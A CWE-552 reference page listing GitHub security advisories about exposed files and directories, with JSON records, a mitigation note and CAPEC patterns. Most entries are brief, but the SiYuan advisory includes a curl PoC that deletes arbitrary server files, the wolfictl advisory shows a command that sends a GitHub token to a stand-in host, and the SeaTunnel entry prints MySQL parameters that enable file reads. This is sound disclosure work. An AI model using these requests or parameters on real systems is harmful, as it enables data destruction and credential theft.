CWE-552
AllowedFiles or Directories Accessible to External Parties
Abstraction: Base · Status: Draft
The product makes files or directories accessible to unauthorized actors, even though they should not be.
670 vulnerabilities reference this CWE, most recent first.
GHSA-89J4-2255-GQ9X
Vulnerability from github – Published: 2025-05-27 21:32 – Updated: 2025-05-27 21:32An arbitrary file read vulnerability in the ReadTextAsynchronous function of SSCMS v7.3.1 allows attackers to read arbitrary files via sending a crafted GET request to /cms/templates/templatesAssetsEditor.
{
"affected": [],
"aliases": [
"CVE-2025-45529"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-27T19:15:25Z",
"severity": "HIGH"
},
"details": "An arbitrary file read vulnerability in the ReadTextAsynchronous function of SSCMS v7.3.1 allows attackers to read arbitrary files via sending a crafted GET request to /cms/templates/templatesAssetsEditor.",
"id": "GHSA-89j4-2255-gq9x",
"modified": "2025-05-27T21:32:16Z",
"published": "2025-05-27T21:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45529"
},
{
"type": "WEB",
"url": "https://gist.github.com/sec-Kode/000fbab6dc649888bc196e76a4076b57"
},
{
"type": "WEB",
"url": "https://github.com/sec-Kode/cve/blob/main/cve2.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8CVQ-3JJP-PH9P
Vulnerability from github – Published: 2025-01-14 18:31 – Updated: 2025-01-14 20:07Affected versions:
- Apache Linkis Metadata Query Service JDBC 1.5.0 before 1.7.0
Description:
In Apache Linkis <1.7.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will allow the attacker to read arbitrary files from the Linkis server. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis < 1.6.0 will be affected.
We recommend users upgrade the version of Linkis to version 1.7.0.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.linkis:linkis-metadata-query-service-jdbc"
},
"ranges": [
{
"events": [
{
"introduced": "1.5.0"
},
{
"fixed": "1.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45627"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-14T20:07:31Z",
"nvd_published_at": "2025-01-14T17:15:17Z",
"severity": "MODERATE"
},
"details": "# Affected versions:\n\n- Apache Linkis Metadata Query Service JDBC 1.5.0 before 1.7.0\n\n# Description:\n\nIn Apache Linkis \u003c1.7.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will allow the attacker to read arbitrary files from the Linkis server. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis \u003c 1.6.0 will be affected.\n\nWe recommend users upgrade the version of Linkis to version 1.7.0.",
"id": "GHSA-8cvq-3jjp-ph9p",
"modified": "2025-01-14T20:07:31Z",
"published": "2025-01-14T18:31:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45627"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/linkis"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/0zzx8lldwoqgzq98mg61hojgpvn76xsh"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/01/14/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Apache Linkis Metadata Query Service JDBC: JDBC Datasource Module with Mysql has file read vulnerability"
}
GHSA-8CXW-WVHC-P4X4
Vulnerability from github – Published: 2022-10-19 19:00 – Updated: 2022-10-21 13:00Jenkins NUnit Plugin 0.27 and earlier implements an agent-to-controller message that parses files inside a user-specified directory as test results, allowing attackers able to control agent processes to obtain test results from files in an attacker-specified directory on the Jenkins controller. NUnit Plugin 0.28 changes the message type from agent-to-controller to controller-to-agent, preventing execution on the controller.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.27"
},
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:nunit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.28"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-43414"
],
"database_specific": {
"cwe_ids": [
"CWE-552",
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-19T22:24:14Z",
"nvd_published_at": "2022-10-19T16:15:00Z",
"severity": "MODERATE"
},
"details": "Jenkins NUnit Plugin 0.27 and earlier implements an agent-to-controller message that parses files inside a user-specified directory as test results, allowing attackers able to control agent processes to obtain test results from files in an attacker-specified directory on the Jenkins controller. NUnit Plugin 0.28 changes the message type from agent-to-controller to controller-to-agent, preventing execution on the controller.",
"id": "GHSA-8cxw-wvhc-p4x4",
"modified": "2022-10-21T13:00:27Z",
"published": "2022-10-19T19:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43414"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/nunit-plugin/commit/e97a5aa804019ab345f50014f56ece23882c7475"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2022-10-19/#SECURITY-2551"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/10/19/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jenkins NUnit Plugin vulnerable to Protection Mechanism Failure"
}
GHSA-8FG7-HP93-QHVR
Vulnerability from github – Published: 2024-05-15 20:02 – Updated: 2024-05-16 14:11Summary
A git authentication issue allows a local user’s GitHub token to be sent to remote servers other than github.com.
Details
Most git-dependent functionality in wolfictl relies on its own git package, which contains centralized logic for implementing interactions with git repositories. Some of this functionality requires authentication in order to access private repositories. There’s a central function GetGitAuth:
https://github.com/wolfi-dev/wolfictl/blob/6d99909f7b1aa23f732d84dad054b02a61f530e6/pkg/git/git.go#L22
This looks for a GitHub token in the environment variable GITHUB_TOKEN and returns it as an HTTP basic auth object to be used with the github.com/go-git/go-git/v5 library.
Most callers (direct or indirect) of GetGitAuth use the token to authenticate to github.com only; however, in some cases callers were passing this authentication without checking that the remote git repository was hosted on github.com.
Issue 1
One of these callers processed git URLs from Melange package configurations, cloning the package’s upstream repository in order to determine which project dependencies have been upgraded since the prior update.
https://github.com/wolfi-dev/wolfictl/blob/4dd6c95abb4bc0f9306350a8601057bd7a92bded/pkg/update/deps/cleanup.go#L49
This issue affects the command wolfictl check update, and the set of remote git hosts is a function of the Melange package configuration files residing in the local directory specified in the command.
Issue 2
Another caller processes a git URL received as a command line argument and clones the repository to look for new available versions of the given project.
https://github.com/wolfi-dev/wolfictl/blob/488b53823350caa706de3f01ec0eded9350c7da7/pkg/update/update.go#L143
This issue affects the command wolfictl update.
This behavior has existed in one form or another since https://github.com/wolfi-dev/wolfictl/commit/0d06e1578300327c212dda26a5ab31d09352b9d0 - committed January 25, 2023.
PoC
GITHUB_TOKEN=test wolfictl update http://git.example.com/
Examining traffic sent to the remote server will show that the HTTP Authorization header contains test in base64 encoded format.
Impact
This impacts anyone who ran the wolfictl check update commands with a Melange configuration that included a git-checkout directive step that referenced a git repository not hosted on github.com.
This also impacts anyone who ran wolfictl update <url> with a remote URL outside of github.com.
Additionally, these subcommands must have run with the GITHUB_TOKEN environment variable set to a valid GitHub token.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/wolfi-dev/wolfictl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.16.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-35183"
],
"database_specific": {
"cwe_ids": [
"CWE-552",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-15T20:02:14Z",
"nvd_published_at": "2024-05-15T22:15:08Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA git authentication issue allows a local user\u2019s GitHub token to be sent to remote servers other than `github.com`.\n\n### Details\n\nMost git-dependent functionality in wolfictl relies on its own `git` package, which contains centralized logic for implementing interactions with git repositories. Some of this functionality requires authentication in order to access private repositories. There\u2019s a central function `GetGitAuth`:\n\nhttps://github.com/wolfi-dev/wolfictl/blob/6d99909f7b1aa23f732d84dad054b02a61f530e6/pkg/git/git.go#L22\n\nThis looks for a GitHub token in the environment variable `GITHUB_TOKEN` and returns it as an HTTP basic auth object to be used with the `github.com/go-git/go-git/v5` library.\n\nMost callers (direct or indirect) of `GetGitAuth` use the token to authenticate to github.com only; however, in some cases callers were passing this authentication without checking that the remote git repository was hosted on github.com.\n\n#### Issue 1\n\nOne of these callers processed git URLs from Melange package configurations, cloning the package\u2019s upstream repository in order to determine which project dependencies have been upgraded since the prior update.\n\nhttps://github.com/wolfi-dev/wolfictl/blob/4dd6c95abb4bc0f9306350a8601057bd7a92bded/pkg/update/deps/cleanup.go#L49\n\nThis issue affects the command `wolfictl check update`, and the set of remote git hosts is a function of the Melange package configuration files residing in the local directory specified in the command.\n\n#### Issue 2\n\nAnother caller processes a git URL received as a command line argument and clones the repository to look for new available versions of the given project.\n\nhttps://github.com/wolfi-dev/wolfictl/blob/488b53823350caa706de3f01ec0eded9350c7da7/pkg/update/update.go#L143\n\nThis issue affects the command `wolfictl update`.\n\n---\n\nThis behavior has existed in one form or another since https://github.com/wolfi-dev/wolfictl/commit/0d06e1578300327c212dda26a5ab31d09352b9d0 - committed January 25, 2023.\n\n### PoC\n\n```shell\nGITHUB_TOKEN=test wolfictl update http://git.example.com/\n```\n\nExamining traffic sent to the remote server will show that the HTTP `Authorization` header contains `test` in base64 encoded format.\n\n### Impact\n\nThis impacts anyone who ran the `wolfictl check update` commands with a Melange configuration that included a `git-checkout` directive step that referenced a git repository not hosted on github.com. \n\nThis also impacts anyone who ran `wolfictl update \u003curl\u003e` with a remote URL outside of github.com. \n\nAdditionally, these subcommands must have run with the `GITHUB_TOKEN` environment variable set to a valid GitHub token.\n",
"id": "GHSA-8fg7-hp93-qhvr",
"modified": "2024-05-16T14:11:10Z",
"published": "2024-05-15T20:02:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/security/advisories/GHSA-8fg7-hp93-qhvr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35183"
},
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/commit/0d06e1578300327c212dda26a5ab31d09352b9d0"
},
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/commit/403e93569f46766b4e26e06cf9cd0cae5ee0c2a2"
},
{
"type": "PACKAGE",
"url": "https://github.com/wolfi-dev/wolfictl"
},
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/blob/488b53823350caa706de3f01ec0eded9350c7da7/pkg/update/update.go#L143"
},
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/blob/4dd6c95abb4bc0f9306350a8601057bd7a92bded/pkg/update/deps/cleanup.go#L49"
},
{
"type": "WEB",
"url": "https://github.com/wolfi-dev/wolfictl/blob/6d99909f7b1aa23f732d84dad054b02a61f530e6/pkg/git/git.go#L22"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "wolfictl leaks GitHub tokens to remote non-GitHub git servers"
}
GHSA-8FX8-PFFW-W498
Vulnerability from github – Published: 2025-01-03 16:24 – Updated: 2025-01-03 19:26Summary
A arbitrary file deletion vulnerability has been identified in the latest version of Siyuan Note. The vulnerability exists in the POST /api/history/getDocHistoryContent endpoint.An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server.
Details
The vulnerability can be reproduced by sending a crafted request to the /api/history/getDocHistoryContent endpoint.
Sending a request to the /api/history/getDocHistoryContent like:
curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'
Replace <abs_filepath_of_a_file> with the absolute file path of the target file you wish to delete.
The historyPath parameter in the payload is processed by the func getDocHistoryContent in api/history.go:133.
In turn, historyPath is passed to the func GetDocHistoryContent located in model/history.go:150 , which is the slink of the vulnerability.
if historyPath exists and does not satisfy the filesys.ParseJSONWithoutFix, then it will be deleted by os.RemoveAll
func GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) {
if !gulu.File.IsExist(historyPath) {
logging.LogWarnf("doc history [%s] not exist", historyPath)
return
}
data, err := filelock.ReadFile(historyPath)
if err != nil {
logging.LogErrorf("read file [%s] failed: %s", historyPath, err)
return
}
isLargeDoc = 1024*1024*1 <= len(data)
luteEngine := NewLute()
historyTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions)
if err != nil {
logging.LogErrorf("parse tree from file [%s] failed, remove it", historyPath)
os.RemoveAll(historyPath)
return
}
...
}
PoC
curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'
Impact
arbitrary file deletion vulnerability
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 0.0.0-20250103014808-d9887aeec1b2"
},
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-21609"
],
"database_specific": {
"cwe_ids": [
"CWE-459",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-03T16:24:34Z",
"nvd_published_at": "2025-01-03T17:15:09Z",
"severity": "HIGH"
},
"details": "### Summary\nA **arbitrary file deletion vulnerability** has been identified in the latest version of Siyuan Note. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint.An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server.\n\n### Details\nThe vulnerability can be reproduced by sending a crafted request to the `/api/history/getDocHistoryContent` endpoint.\n\nSending a request to the `/api/history/getDocHistoryContent` like:\n\n```\ncurl \"http://127.0.0.1:6806/api/history/getDocHistoryContent\" -X POST -H \"Content-Type: application/json\" -d \u0027{\"historyPath\":\"\u003cabs_filepath_of_a_file\u003e\"}\u0027\n```\n\nReplace `\u003cabs_filepath_of_a_file\u003e` with the absolute file path of the target file you wish to delete.\n\n\n\nThe `historyPath` parameter in the payload is processed by the `func getDocHistoryContent` in `api/history.go:133`.\n\nIn turn, `historyPath` is passed to the `func GetDocHistoryContent` located in `model/history.go:150` , which is the slink of the vulnerability.\n\nif `historyPath` exists and does not satisfy the `filesys.ParseJSONWithoutFix`, then it will be deleted by `os.RemoveAll`\n\n```go\nfunc GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) {\n\tif !gulu.File.IsExist(historyPath) {\n\t\tlogging.LogWarnf(\"doc history [%s] not exist\", historyPath)\n\t\treturn\n\t}\n\n\tdata, err := filelock.ReadFile(historyPath)\n\tif err != nil {\n\t\tlogging.LogErrorf(\"read file [%s] failed: %s\", historyPath, err)\n\t\treturn\n\t}\n\tisLargeDoc = 1024*1024*1 \u003c= len(data)\n\n\tluteEngine := NewLute()\n\thistoryTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions)\n\tif err != nil {\n\t\tlogging.LogErrorf(\"parse tree from file [%s] failed, remove it\", historyPath)\n\t\tos.RemoveAll(historyPath)\n\t\treturn\n\t}\n\t...\n}\n```\n\n\n\n### PoC\n```\ncurl \"http://127.0.0.1:6806/api/history/getDocHistoryContent\" -X POST -H \"Content-Type: application/json\" -d \u0027{\"historyPath\":\"\u003cabs_filepath_of_a_file\u003e\"}\u0027\n```\n\n### Impact\narbitrary file deletion vulnerability\n",
"id": "GHSA-8fx8-pffw-w498",
"modified": "2025-01-03T19:26:05Z",
"published": "2025-01-03T16:24:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-8fx8-pffw-w498"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21609"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/commit/d9887aeec1b27073bec66299a9a4181dc42969f3"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "SiYuan has an arbitrary file deletion vulnerability"
}
GHSA-8GC3-XQ83-PHWW
Vulnerability from github – Published: 2022-09-30 00:00 – Updated: 2022-10-05 00:00A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated.
{
"affected": [],
"aliases": [
"CVE-2022-40126"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-29T12:15:00Z",
"severity": "HIGH"
},
"details": "A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated.",
"id": "GHSA-8gc3-xq83-phww",
"modified": "2022-10-05T00:00:40Z",
"published": "2022-09-30T00:00:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40126"
},
{
"type": "WEB",
"url": "https://github.com/Fndroid/clash_for_windows_pkg/issues/3405"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8GX2-FCJG-WFJV
Vulnerability from github – Published: 2024-09-10 21:31 – Updated: 2024-09-10 21:31A vulnerability was found in Mercury MNVR816 up to 2.0.1.0.5. It has been classified as problematic. This affects an unknown part of the file /web-static/. The manipulation leads to files or directories accessible. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2024-8655"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-10T20:15:05Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Mercury MNVR816 up to 2.0.1.0.5. It has been classified as problematic. This affects an unknown part of the file /web-static/. The manipulation leads to files or directories accessible. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-8gx2-fcjg-wfjv",
"modified": "2024-09-10T21:31:40Z",
"published": "2024-09-10T21:31:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8655"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.276963"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.276963"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.401301"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-8J4V-G972-GJ5H
Vulnerability from github – Published: 2022-01-11 00:00 – Updated: 2022-01-15 00:03An implicit Intent hijacking vulnerability in Dialer prior to SMR Jan-2022 Release 1 allows unprivileged applications to access contact information.
{
"affected": [],
"aliases": [
"CVE-2022-22270"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-10T14:12:00Z",
"severity": "MODERATE"
},
"details": "An implicit Intent hijacking vulnerability in Dialer prior to SMR Jan-2022 Release 1 allows unprivileged applications to access contact information.",
"id": "GHSA-8j4v-g972-gj5h",
"modified": "2022-01-15T00:03:21Z",
"published": "2022-01-11T00:00:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22270"
},
{
"type": "WEB",
"url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2022\u0026month=1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-8M6J-C7JR-PC5F
Vulnerability from github – Published: 2022-08-29 20:06 – Updated: 2022-09-08 00:00A vulnerability was found in fapolicyd. The vulnerability occurs due to an assumption on how glibc names the runtime linker, a build time regular expression may not correctly detect the runtime linker. The consequence is that the pattern detection for applications launched by the run time linker may fail to detect the pattern and allow execution.
{
"affected": [],
"aliases": [
"CVE-2022-1117"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-29T15:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability was found in fapolicyd. The vulnerability occurs due to an assumption on how glibc names the runtime linker, a build time regular expression may not correctly detect the runtime linker. The consequence is that the pattern detection for applications launched by the run time linker may fail to detect the pattern and allow execution.",
"id": "GHSA-8m6j-c7jr-pc5f",
"modified": "2022-09-08T00:00:33Z",
"published": "2022-08-29T20:06:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1117"
},
{
"type": "WEB",
"url": "https://github.com/linux-application-whitelisting/fapolicyd/commit/38a942613f93824c53164730b2b7a2f75b8cd263"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2022:1898"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2022:4824"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2022-1117"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2066904"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2068171"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8M84-H9HH-3CFH
Vulnerability from github – Published: 2024-08-21 12:30 – Updated: 2024-08-21 20:10Mysql security vulnerability in Apache SeaTunnel.
Attackers can read files on the MySQL server by modifying the information in the MySQL URL
allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360 This issue affects Apache SeaTunnel: 1.0.0.
Users are recommended to upgrade to version [1.0.1], which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.seatunnel:seatunnel"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.0.0"
]
}
],
"aliases": [
"CVE-2023-49198"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-21T20:10:12Z",
"nvd_published_at": "2024-08-21T10:15:04Z",
"severity": "HIGH"
},
"details": "Mysql security vulnerability in Apache SeaTunnel.\n\nAttackers can read files on the MySQL server by modifying the information in the MySQL URL\n\n allowLoadLocalInfile=true\u0026allowUrlInLocalInfile=true\u0026allowLoadLocalInfileInPath=/\u0026maxAllowedPacket=655360\nThis issue affects Apache SeaTunnel: 1.0.0.\n\nUsers are recommended to upgrade to version [1.0.1], which fixes the issue.",
"id": "GHSA-8m84-h9hh-3cfh",
"modified": "2024-08-21T20:10:12Z",
"published": "2024-08-21T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49198"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/seatunnel"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/48j9f1nsn037mgzc4j9o51nwglb1s08h"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Apache SeaTunnel SQL Injection vulnerability"
}
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.
CAPEC-150: Collect Data from Common Resource Locations
An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.
CAPEC-639: Probe System Files
An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.